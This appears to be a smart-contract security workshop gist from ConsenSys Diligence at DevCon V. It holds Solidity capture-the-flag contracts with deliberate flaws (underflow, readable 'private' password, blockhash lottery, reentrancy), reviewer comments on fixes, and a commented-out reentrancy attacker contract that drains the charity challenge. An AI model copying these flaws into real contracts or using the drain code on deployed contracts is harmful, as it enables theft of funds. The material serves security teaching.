
@shayanb
Last active October 9, 2019 11:39
Created using remix-ide: Realtime Ethereum Contract Compiler and Runtime. Load this file by pasting this gist's URL or ID at https://remix.ethereum.org/#version=soljson-v0.5.8+commit.23d335f2.js&optimize=false&gist=

// ConsenSys Diligence // DevCon V - October 2019 // Osaka, Japan

These files: https://kik.to/d5



Ethereum Smart Contract Security Best Practices: https://consensys.github.io/smart-contract-best-practices

Capture the Ether: https://capturetheether.com

ConsenSys Diligence Twitter: @ConsenSysAudits

More about what we do: https://diligence.consensys.net/




// ██████╗ ██████╗ ███╗ ██╗███████╗███████╗███╗ ██╗███████╗██╗ ██╗███████╗ // ██╔════╝██╔═══██╗████╗ ██║██╔════╝██╔════╝████╗ ██║██╔════╝╚██╗ ██╔╝██╔════╝ // ██║ ██║ ██║██╔██╗ ██║███████╗█████╗ ██╔██╗ ██║███████╗ ╚████╔╝ ███████╗ // ██║ ██║ ██║██║╚██╗██║╚════██║██╔══╝ ██║╚██╗██║╚════██║ ╚██╔╝ ╚════██║ // ╚██████╗╚██████╔╝██║ ╚████║███████║███████╗██║ ╚████║███████║ ██║ ███████║ // ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝╚══════╝╚══════╝╚═╝ ╚═══╝╚══════╝ ╚═╝ ╚══════╝

// ██████╗ ██╗██╗ ██╗ ██████╗ ███████╗███╗ ██╗ ██████╗███████╗
// ██╔══██╗██║██║ ██║██╔════╝ ██╔════╝████╗ ██║██╔════╝██╔════╝
// ██║ ██║██║██║ ██║██║ ███╗█████╗ ██╔██╗ ██║██║ █████╗
// ██║ ██║██║██║ ██║██║ ██║██╔══╝ ██║╚██╗██║██║ ██╔══╝
// ██████╔╝██║███████╗██║╚██████╔╝███████╗██║ ╚████║╚██████╗███████╗
// ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═══╝ ╚═════╝╚══════╝

// ConsenSys Diligence
// DevCon V - October 2019
// Osaka, Japan
pragma solidity ^0.5.4;
// Can you have a gazillion balance?
// challenge1: workshop exercise built around a single unsigned counter.
// Reviewer note: this file compiles under `pragma solidity ^0.5.4`, where `+=` and
// `-=` on uint256 wrap modulo 2**256 instead of reverting (SWC-101). Nothing in
// this contract bounds either operation.
contract challenge1 {
// One contract-wide counter, not a per-account ledger; `public` generates a getter.
uint256 public balance;
// Deployment seeds the counter with 10.
constructor() public {
balance = 10;
}
// Adds the wei sent with the call to the counter. The ether itself stays in the
// contract: no function here sends value out.
function buy() external payable {
balance += msg.value;
}
// Subtracts a caller-chosen amount from the counter. There is no access control
// and no `amount <= balance` check, so an amount larger than the counter wraps it
// to a value close to 2**256.
// Defensive form: `require(amount <= balance);` before the subtraction, a
// SafeMath-style checked subtraction, or a compiler >= 0.8.0, which reverts on
// underflow by default.
function burn(uint256 amount) external {
balance -= amount;
}
}
// ___ __ __ _ ____ ____ __ _ ____ _ _ ____
// / __)/ \ ( ( \/ ___)( __)( ( \/ ___)( \/ )/ ___)
// ( (__( O )/ /\___ \ ) _) / /\___ \ ) / \___ \
// \___)\__/ \_)__)(____/(____)\_)__)(____/(__/ (____/
// ____ __ __ __ ___ ____ __ _ ___ ____
// ( \( )( ) ( )/ __)( __)( ( \ / __)( __)
// ) D ( )( / (_/\ )(( (_ \ ) _) / /( (__ ) _)
// (____/(__)\____/(__)\___/(____)\_)__) \___)(____)
// ConsenSys Diligence
// DevCon V - October 2019
// Osaka, Japan
pragma solidity ^0.5.4;
// Guess the password for the safe
// Deployed on Ropsten: 0xC224beb93142607b91d21BBd4A67a34a50E26AAB
// challenge2: password-gated payout.
// Reviewer note: the design assumes `hash` and the password stay secret. On a
// public chain neither does. `private` only stops other contracts from reading the
// variable through Solidity; contract storage, constructor arguments and the
// calldata of every changePassword call are visible to any node (SWC-136).
// An authorization check should rest on msg.sender or a signature, not on a value
// that must be published in order to be used.
contract challenge2 {
// keccak256 of the ABI-encoded password; see the note above on what `private` covers.
bytes32 private hash;
// Deployer address; the only account accepted by changePassword.
address public owner;
// Deployment must carry exactly 1 ether. The plaintext password is a constructor
// argument and therefore part of the deployment transaction.
constructor(string memory secretPassword) public payable{
require(msg.value == 1 ether); // exactly 1 ether deposit required
owner = msg.sender;
hash = keccak256(abi.encode(secretPassword));
}
// Owner-only replacement of the stored hash; each call must add exactly 1 ether.
// The new password travels in cleartext calldata.
function changePassword(string memory secretPassword) public payable{
require(msg.sender == owner); // only the owner may rotate the password
require(msg.value == 1 ether); // exactly 1 ether deposit required
hash = keccak256(abi.encode(secretPassword));
}
// Pays 1337 wei to any caller whose input hashes to the stored value.
// No state changes on success, so the same input is accepted on every later call.
// The function is payable: ether attached to a guess stays in the contract.
// `transfer` reverts the whole call if the payout cannot be made.
function guessPassword(string memory password) public payable {
require(keccak256(abi.encode(password)) == hash);
msg.sender.transfer(1337);
}
}
// _________ _________
// \_ ___ \ ____ ____ ______ ____ ____ / _____/__.__. ______
// / \ \/ / _ \ / \ / ___// __ \ / \ \_____ < | |/ ___/
// \ \___( <_> ) | \\___ \\ ___/| | \/ \___ |\___ \
// \______ /\____/|___| /____ >\___ >___| /_______ / ____/____ >
// \/ \/ \/ \/ \/ \/\/ \/
// ________ .__.__ .__
// \______ \ |__| | |__| ____ ____ ____ ____ ____
// | | \| | | | |/ ___\_/ __ \ / \_/ ___\/ __ \
// | ` \ | |_| / /_/ > ___/| | \ \__\ ___/
// /_______ /__|____/__\___ / \___ >___| /\___ >___ >
// \/ /_____/ \/ \/ \/ \/
// ConsenSys Diligence
// DevCon V - October 2019
// Osaka, Japan
pragma solidity ^0.5.4;
// Lottery using block hash as source of randomness
// Deployed on Ropsten: 0x70707c3163575fb0eba9f291f75ff0742cb18386
// challenge3: lottery that derives its winning number from a block hash.
// Reviewer note: `blockhash(block.number - 1)` is identical for every transaction
// in a block and readable by any contract, so `answer` is fixed and publicly
// computable before `lottery` runs (SWC-120). Block data is not a source of
// unpredictability; a commit-reveal scheme or an external verifiable randomness
// source is the usual replacement.
contract challenge3 {
// Most recently computed winning number; overwritten on every lottery call.
uint256 public answer;
// Deployment must carry exactly 1 ether.
constructor () payable public {
require(msg.value == 1 ether);
}
// Takes a guess `n` together with a non-zero ticket payment and pays 1337 wei on
// a match. The ticket payment stays in the contract whether or not the guess wins.
function lottery(uint256 n) payable public {
require(msg.value > 0); // ticket price: any non-zero amount
// The only input to the hash is the previous block's hash; no secret held by the
// contract or the caller is mixed in.
answer = uint256(keccak256(abi.encode(blockhash(block.number - 1))));
if (n == answer) {
msg.sender.transfer(1337);
}
}
}
// ___ __
// / __\___ _ __ ___ ___ _ __ / _\_ _ ___
// / / / _ \| '_ \/ __|/ _ \ '_ \\ \| | | / __|
// / /__| (_) | | | \__ \ __/ | | |\ \ |_| \__ \
// \____/\___/|_| |_|___/\___|_| |_\__/\__, |___/
// |___/
// ___ _ _ _
// / (_) (_) __ _ ___ _ __ ___ ___
// / /\ / | | |/ _` |/ _ \ '_ \ / __/ _ \
// / /_//| | | | (_| | __/ | | | (_| __/
// /___,' |_|_|_|\__, |\___|_| |_|\___\___|
// |___/
// contract attack {
// doAttack (challenge3 target) public payable {
// require(msg.value > 0);
// target.lottery.value(msg.value)(???);
// msg.sender.transfer(address(this).balance);
// //selfdestruct(msg.sender);
// }
// }
// ConsenSys Diligence
// DevCon V - October 2019
// Osaka, Japan
pragma solidity ^0.5.4;
// Steal money from charity (For educational purposes only)
// Deployed on Ropsten: 0x315a3254ff66c387a87d1771ae4877b4782a1a7c
// challenge4: donation ledger with a withdraw function.
// Reviewer note: `withdraw` performs its external call before it updates the
// ledger, which is the reentrancy pattern catalogued as SWC-107. The details and
// the defensive ordering are documented on the function itself.
contract challenge4 {
// Per-address credit in wei; `public` generates a getter.
mapping(address => uint) public balances;
// Emitted only when the outbound call in withdraw reports success.
event paid(address payee, uint amount);
// Deployment must carry exactly 1 ether, credited to the deployer.
constructor() public payable{
require(msg.value == 1 ether);
balances[msg.sender] = msg.value;
}
// Credits the attached wei to `_to`. The `+=` is unchecked under this pragma.
function donate(address _to) public payable {
balances[_to] += msg.value;
}
// Returns the ledger entry for `_who` (same data as the generated `balances` getter).
function balanceOf(address _who) public view returns (uint balance) {
return balances[_who];
}
// Sends `_amount` wei to the caller when the ledger shows at least that much.
// Order of operations is check -> external call -> ledger update:
//  - `call.value` forwards all remaining gas, so a contract recipient's fallback
//    can call back into withdraw while balances[msg.sender] still holds the old
//    value and the check passes again.
//  - The late `-=` is unchecked under this pragma, so repeated deductions against
//    the same entry can wrap it instead of reverting (SWC-101).
//  - A failed call (success == false) is not reverted: no event is emitted, but
//    the ledger is still debited.
// Defensive form: debit the ledger first, then make the call, then
// `require(success)` (checks-effects-interactions), optionally behind a
// reentrancy guard.
function withdraw(uint _amount) public {
if(balances[msg.sender] >= _amount) {
(bool success, ) = msg.sender.call.value(_amount)("");
if(success) {
emit paid(msg.sender, _amount);
}
balances[msg.sender] -= _amount; // ledger debit happens after the external call
}
}
// Accepts plain ether transfers without crediting any ledger entry.
function() external payable {}
}
// ______ ______ __ __ ______ ______ __ __ ______ __ __ ______
// /\ ___\ /\ __ \ /\ "-.\ \ /\ ___\ /\ ___\ /\ "-.\ \ /\ ___\ /\ \_\ \ /\ ___\
// \ \ \____ \ \ \/\ \ \ \ \-. \ \ \___ \ \ \ __\ \ \ \-. \ \ \___ \ \ \____ \ \ \___ \
// \ \_____\ \ \_____\ \ \_\\"\_\ \/\_____\ \ \_____\ \ \_\\"\_\ \/\_____\ \/\_____\ \/\_____\
// \/_____/ \/_____/ \/_/ \/_/ \/_____/ \/_____/ \/_/ \/_/ \/_____/ \/_____/ \/_____/
// _____ __ __ __ ______ ______ __ __ ______ ______
// /\ __-. /\ \ /\ \ /\ \ /\ ___\ /\ ___\ /\ "-.\ \ /\ ___\ /\ ___\
// \ \ \/\ \ \ \ \ \ \ \____ \ \ \ \ \ \__ \ \ \ __\ \ \ \-. \ \ \ \____ \ \ __\
// \ \____- \ \_\ \ \_____\ \ \_\ \ \_____\ \ \_____\ \ \_\\"\_\ \ \_____\ \ \_____\
// \/____/ \/_/ \/_____/ \/_/ \/_____/ \/_____/ \/_/ \/_/ \/_____/ \/_____/
// contract Attacker {
// challenge4 target;
// constructor(address payable targetAddress) public payable {
// target = challenge4(targetAddress);
// target.donate.value(msg.value)(address(this));
// }
// function attack() public {
// target.withdraw(target.balanceOf(address(this)));
// }
// function () external payable {
// if (address(target).balance >= 1 ether) {
// //The check also can be on gas
// target.withdraw(target.balanceOf(address(this)));
// }
// }
// }
// ConsenSys Diligence
// DevCon V - October 2019
// Osaka, Japan
pragma solidity ^0.5.4;
// challenge5: placeholder; declares two state variables and no functions.
contract challenge5 {
// Public string with a generated getter; nothing in this contract writes it.
string public name;
// `private` limits access from other contracts only; the storage slot remains
// readable off-chain. Nothing in this contract assigns it.
address private owner;
// Placeholder: challenge body not provided.
}
// ██████╗ ██████╗ ███╗ ██╗███████╗███████╗███╗ ██╗███████╗██╗ ██╗███████╗
// ██╔════╝██╔═══██╗████╗ ██║██╔════╝██╔════╝████╗ ██║██╔════╝╚██╗ ██╔╝██╔════╝
// ██║ ██║ ██║██╔██╗ ██║███████╗█████╗ ██╔██╗ ██║███████╗ ╚████╔╝ ███████╗
// ██║ ██║ ██║██║╚██╗██║╚════██║██╔══╝ ██║╚██╗██║╚════██║ ╚██╔╝ ╚════██║
// ╚██████╗╚██████╔╝██║ ╚████║███████║███████╗██║ ╚████║███████║ ██║ ███████║
// ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝╚══════╝╚══════╝╚═╝ ╚═══╝╚══════╝ ╚═╝ ╚══════╝
// ██████╗ ██╗██╗ ██╗ ██████╗ ███████╗███╗ ██╗ ██████╗███████╗
// ██╔══██╗██║██║ ██║██╔════╝ ██╔════╝████╗ ██║██╔════╝██╔════╝
// ██║ ██║██║██║ ██║██║ ███╗█████╗ ██╔██╗ ██║██║ █████╗
// ██║ ██║██║██║ ██║██║ ██║██╔══╝ ██║╚██╗██║██║ ██╔══╝
// ██████╔╝██║███████╗██║╚██████╔╝███████╗██║ ╚████║╚██████╗███████╗
// ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═══╝ ╚═════╝╚══════╝
// ConsenSys Diligence
// DevCon V - October 2019
// Osaka, Japan
pragma solidity ^0.5.4;
// Say Hi
//Deployed at Ropsten: 0x0f6501d05272b95b8ad35c64f1939626ff01c81d
// helloWorld: minimal example of storage, an owner check, an event and a fallback.
contract helloWorld {
    // Storage layout: `name` first, then `owner` (order kept as declared originally).
    // `name` is only ever written by the owner through sayHi.
    string public name;
    // Set once at deployment; `private` hides it from other contracts, not from
    // anyone reading chain state.
    address private owner;

    // Logged on every sayHi call and on every fallback call.
    event Hi(string name);

    // The deploying account becomes the owner.
    constructor() public {
        owner = msg.sender;
    }

    // Fallback: not payable, so calls carrying ether revert; otherwise logs a
    // fixed greeting.
    function() external {
        emit Hi("Hello World");
    }

    // Logs `_name` for any caller; additionally stores it in `name` when the
    // caller is the owner.
    function sayHi(string memory _name) public {
        bool callerIsOwner = (owner == msg.sender);
        if (callerIsOwner) {
            name = _name;
        }
        emit Hi(_name);
    }
}
// ______ _____
// / ____/___ ____ ________ ____ / ___/__ _______
// / / / __ \/ __ \/ ___/ _ \/ __ \\__ \/ / / / ___/
// / /___/ /_/ / / / (__ ) __/ / / /__/ / /_/ (__ )
// \__________/___/_/____/\___/_/ /_/____/\__, /____/
// / __ \(_) (_)___ ____ ____ ______//___/
// / / / / / / / __ `/ _ \/ __ \/ ___/ _ \
// / /_/ / / / / /_/ / __/ / / / /__/ __/
// /_____/_/_/_/\__, /\___/_/ /_/\___/\___/
// /____/